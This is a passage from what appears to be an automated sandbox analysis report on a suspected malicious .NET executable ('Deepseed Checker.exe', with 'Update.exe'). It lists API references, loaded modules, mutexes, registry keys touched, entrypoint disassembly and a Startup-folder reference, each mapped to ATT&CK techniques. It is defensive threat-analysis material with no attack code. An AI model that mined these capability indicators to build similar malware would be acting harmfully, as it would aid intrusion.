\"SetUnhandledExceptionFilter\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"RtlLookupFunctionEntry\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"RtlCaptureContext\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"CreateFileMappingA\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"SetThreadStackGuarantee\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"DuplicateHandle\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"HeapReAlloc\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"InitOnceBeginInitialize\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetFileInformationByHandleEx\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"AddVectoredExceptionHandler\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"InitializeCriticalSection\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"UnmapViewOfFile\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"VirtualQuery\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"TlsGetValue\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"Sleep\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"WriteConsoleW\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"TlsSetValue\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetCurrentThread\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"VirtualAlloc\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"SetLastError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"LeaveCriticalSection\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"RtlNtStatusToDosError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"NtWriteFile\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API (Indicator: \"GetTempPath\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API (Indicator: \"GetObject\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")\n Found reference to API (Indicator: \"MessageBox\"; Source: \"00000000-00002512.00000001.90116.010B2000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-3", "type": 10, "name": "Loads the .NET runtime environment", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 63910000\n \"Deepseed Checker.exe\" loaded module \"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" at 62500000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 75420000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Global\\CLR_PerfMon_WrapMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"RasPbFile\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\CLR_PerfMon_WrapMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\RasPbFile\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" [Source: 00000000-00003276-00000C2B-252663804]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll\" [Source: 00000000-00003276-00000C28-406203150]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoree.dll\" [Source: 00000000-00003276-00000C28-407393282]\n Observed system executable string:\"%WINDIR%\\system32\\combase.dll\" [Source: 00000000-00003276-00000C28-407479332]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll\" [Source: 00000000-00003276-00000C28-407923641]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\ole32.dll\" [Source: 00000000-00003276-00000C28-407967013]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll\" [Source: 00000000-00003276-00000C28-408091222]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll\" [Source: 00000000-00003276-00000C28-408145839]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll\" [Source: 00000000-00003276-00000C28-408217733]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.V9921e851#\\a891970b44db9e340c3ef3efa95b793c\\Microsoft.VisualBasic.ni.dll\" [Source: 00000000-00003276-00000C28-409209229]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Net.Http\\c1f72f0ca85cb675a88efe8f2067f7c8\\System.Net.Http.ni.dll\" [Source: 00000000-00003276-00000C28-409269664]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\f7568d7f1b9d356f64779b4c0927cfb3\\System.Drawing.ni.dll\" [Source: 00000000-00003276-00000C28-409322362]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\c9a4cbc00f690a9e3cddfc400f6e85bb\\System.Windows.Forms.ni.dll\" [Source: 00000000-00003276-00000C28-409497258]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\psapi.dll\" [Source: 00000000-00003276-00000C28-409735780]\n Observed system executable string:\"%WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll\" [Source: 00000000-00003276-00000C28-410034469]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll\" [Source: 00000000-00003276-00000C28-410078183]\n Observed system executable string:\"%WINDIR%\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll\" [Source: 00000000-00003276-00000C28-410126301]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\bcrypt.dll\" [Source: 00000000-00003276-00000C28-410490449]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\shell32.dll\" [Source: 00000000-00003276-00000C28-410722784]\n Observed system executable string:\"%WINDIR%\\system32\\en-US\\tzres.dll.mui\" [Source: 00000000-00003276-00000C28-410850267]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\iphlpapi.dll\" [Source: 00000000-00003276-00000C28-411095188]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\rasapi32.dll\" [Source: 00000000-00003276-00000C28-411636549]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\ws2_32.dll\" [Source: 00000000-00003276-00000C28-411968697]\n Observed system executable string:\"%WINDIR%\\Microsoft.Net\\assembly\\GAC_MSIL\\System\\v4.0_4.0.0.0__b77a5c561934e089\\winhttp.dll\" [Source: 00000000-00003276-00000C28-412583053]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00003276-00000C28-413843218]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\INPROCSERVER32\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Previous Versions Property Page\" (Path: \"HKCU\\CLSID\\{596AB062-B4D2-4215-9F74-E9109B0A8153}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Microsoft SendTo Service\" (Path: \"HKCU\\CLSID\\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Copy as Path Menu\" (Path: \"HKCU\\CLSID\\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Start Menu Pin\" (Path: \"HKCU\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Taskband Pin\" (Path: \"HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Groove GFS Context Menu Handler\" (Path: \"HKCU\\CLSID\\{6C467336-8281-4E60-8204-430CED96822D}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Shell extensions for sharing\" (Path: \"HKCU\\CLSID\\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Encryption Context Menu\" (Path: \"HKCU\\CLSID\\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Open With Context Menu Handler\" (Path: \"HKCU\\CLSID\\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Briefcase\" (Path: \"HKCU\\CLSID\\{85BBD920-42A0-1069-A2E4-08002B30309D}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"7-Zip Shell Extension\" (Path: \"HKCU\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"CompatContextMenu Class\" (Path: \"HKCU\\CLSID\\{1D27F844-3A1F-4410-85AC-14651078412D}\\SHELLEX\\MAYCHANGEDEFAULTMENU\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"File Property Page Extension\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{21B22460-3AEA-1069-A2DC-08002B30309D}\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"Deepseed Checker.exe\" touched \"NDP SymBinder\" (Path: \"HKCU\\CLSID\\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\\INPROCSERVER32\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-319", "type": 2, "relevance": 1, "name": "Contains ability to set/get the last-error code for a calling thread (API string)", "description": "Found reference to API \"GetLastError\" (Indicator: \"GetLastError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")\n Found reference to API \"SetLastError\" (Indicator: \"SetLastError\"; File: \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"Deepseed Checker.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\teax, dword ptr [eax],add\tbyte ptr [eax], al,pop\tes,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], cl,add\tbyte ptr [eax], al,add\tbyte ptr [0], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [edx], al,add\tbyte ptr [eax], al,add\tbyte ptr [ebx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax + eax], al,add\tbyte ptr [eax], al,add\teax, 0,add\tbyte ptr [eax], al,add\tbyte ptr [ebx], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [edi], al,add\tbyte ptr [eax], al,add\tbyte ptr [0x2000000], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"\n \"Update.exe\" file has an entrypoint instructions - \"sub\trsp, 0x28,mov\trax, qword ptr [rip + 0x3de745],mov\tdword ptr [rax], 1,call\t0x140001180,nop\t,nop\t,add\trsp, 0x28,ret\t,nop\tdword ptr [rax],sub\trsp, 0x28,mov\trax, qword ptr [rip + 0x3de725],mov\tdword ptr [rax], 0,call\t0x140001180,nop\t,nop\t,add\trsp, 0x28,ret\t,nop\tdword ptr [rax],sub\trsp, 0x28,call\t0x140034050,cmp\trax, 1,sbb\teax, eax,add\trsp, 0x28,ret\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,ret\t,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"\n \"Deepseed Checker.exe\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-108", "relevance": 1, "name": "Contains ability to execute application (Dotnet)", "description": "Observed function \"set_UseShellExecute\" in \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0\"\n Observed function \"set_UseShellExecute\" in \"Deepseed Checker.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-111", "relevance": 1, "name": "Contains ability to start a process (Dotnet)", "description": "Observed function \"Process.get_StartInfo\" in \"Deepseed Checker.exe\"\n Observed function \"Process.Start\" in \"Deepseed Checker.exe\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-265", "type": 2, "relevance": 1, "name": "Contains reference to Windows Startup folder", "description": "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.ini\" (Indicator: \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\desktop.ini\") in Source: 00000000-00003276.00000001.89703.00360000.00000004.mdmp", "origin": "File/Memory", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-93", "relevance": 1, "name": "PE file has a high image base", "description": "\"Update.exe\" has high imagebase \"0x140000000\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 712d0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"KERNEL32\" at base 75ee0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"ADVAPI32.DLL\" at base 777d0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6add0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"SHLWAPI.DLL\" at base 76400000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"VERSION.DLL\" at base 74da0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 64d20000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"USER32.DLL\" at base 77b70000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"MSCOREE.DLL\" at base 6ae60000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"PSAPI.DLL\" at base 77c40000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"RPCRT4.DLL\" at base 77880000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"KERNEL32.DLL\" at base 75ee0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 63910000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"OLE32.DLL\" at base 76070000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"CRYPTBASE.DLL\" at base 75800000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 72c30000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6c4a0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 62eb0000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 62690000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MICROSOFT.V9921E851#\\A891970B44DB9E340C3EF3EFA95B793C\\MICROSOFT.VISUALBASIC.NI.DLL\" at base 68c50000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.NET.HTTP\\C1F72F0CA85CB675A88EFE8F2067F7C8\\SYSTEM.NET.HTTP.NI.DLL\" at base 6c410000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 68900000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 61820000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module \"SSPICLI.DLL\" at base 75790000\n \"8412251bb4b9b18dfc4bfb854167b48e2d968942c467a7bf09ae5a66651b8ef0.exe\" loaded module 